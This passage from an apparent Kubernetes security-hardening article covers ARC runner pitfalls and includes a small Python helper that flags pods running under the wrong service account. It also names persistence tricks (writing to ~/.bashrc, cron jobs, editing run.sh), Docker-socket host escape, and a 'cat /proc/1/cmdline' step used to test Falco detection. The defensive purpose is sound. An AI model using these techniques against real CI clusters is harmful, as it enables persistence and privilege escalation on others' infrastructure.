Persistent runners left as the default: The ARC Helm chart defaults and quick-start documentation focus on getting runners working, not on making them ephemeral. Teams that deploy ARC from the default chart without setting RUNNER_EPHEMERAL: "true" run persistent runners indefinitely. A malicious workflow step that writes to ~/.bashrc, installs a cron job inside the container, or modifies /home/runner/run.sh persists across jobs until the pod is manually deleted or the node is recycled. Ephemeral runners should be treated as a deployment prerequisite, not an optional optimisation.
Inheriting the controller service account: If the AutoscalingRunnerSet does not specify serviceAccountName: arc-runner in its pod template, Kubernetes assigns the default service account of the arc-runners namespace. If the arc-system namespace and arc-runners namespace are the same (a common shortcut in quick-start deployments), the runner pods may inherit the controller’s service account. The controller’s service account has permission to create pods, read secrets, and manage runners — exactly the permissions a compromised runner needs to escalate within the cluster. Verify: kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.serviceAccountName}' should return arc-runner (the restricted account), not arc-controller or default.
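The jsonpath check prints a flat list of names, which is awkward to read once several pods are running. As a sketch, the same verification can be done on the full JSON output, reporting each pod that is not using the expected account. The function name is hypothetical, the sample data is made up for illustration, and arc-runner is the account name used in this article.

```python
import json


def misassigned_pods(pod_list_json: str, expected_sa: str = "arc-runner") -> list[str]:
    """List pods whose service account differs from the expected one.

    Expects the output of: kubectl get pods -n arc-runners -o json
    """
    pods = json.loads(pod_list_json).get("items", [])
    bad = []
    for pod in pods:
        # Kubernetes fills in "default" when no account is specified.
        sa = pod.get("spec", {}).get("serviceAccountName", "default")
        if sa != expected_sa:
            bad.append(f'{pod["metadata"]["name"]} uses {sa}')
    return bad


# Made-up sample in the shape of a kubectl pod list.
SAMPLE = json.dumps({"items": [
    {"metadata": {"name": "arc-runner-set-rg9k4-runner"},
     "spec": {"serviceAccountName": "arc-runner"}},
    {"metadata": {"name": "arc-runner-set-rg9k5-runner"},
     "spec": {"serviceAccountName": "arc-controller"}},
]})

print(misassigned_pods(SAMPLE))  # ['arc-runner-set-rg9k5-runner uses arc-controller']
```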
NetworkPolicy without CNI enforcement: Creating a NetworkPolicy object in a cluster running a CNI plugin that does not enforce it produces no security effect whatsoever. The object is accepted by the API server and stored in etcd but never applied to iptables or eBPF rules. Flannel in its default configuration, for example, does not enforce NetworkPolicy. Calico, Cilium, and Weave Net do. Before relying on the network policy controls in this article, verify that your CNI enforces them: deploy a test pod with the runner labels and attempt to connect to the Kubernetes API server. If the connection succeeds, enforcement is not active.
Docker socket mount “just for one step”: The Docker socket mount is often added incrementally. A workflow needs to build an image; the platform engineer adds the socket mount “temporarily”; the runner pod becomes a permanent host-escape vector. There is no safe scoping of a Docker socket mount — any workflow step on that runner, not just the one that needs Docker, can use the socket. The correct solution is Kaniko or Buildah, not a scoped mount. If the Docker socket is present in any runner pod configuration, assume that any workflow on that runner has node-level access.
Falco rules with wrong label selectors: The Falco rules above select pods by container.label.app = "arc-runner". If the AutoscalingRunnerSet pod template does not include this label, the rules match nothing. After deploying the rules, verify with a test: run a workflow step that executes cat /proc/1/cmdline and confirm the Falco alert fires. Silence is not safety; silence may mean the rule selector does not match your runner pods.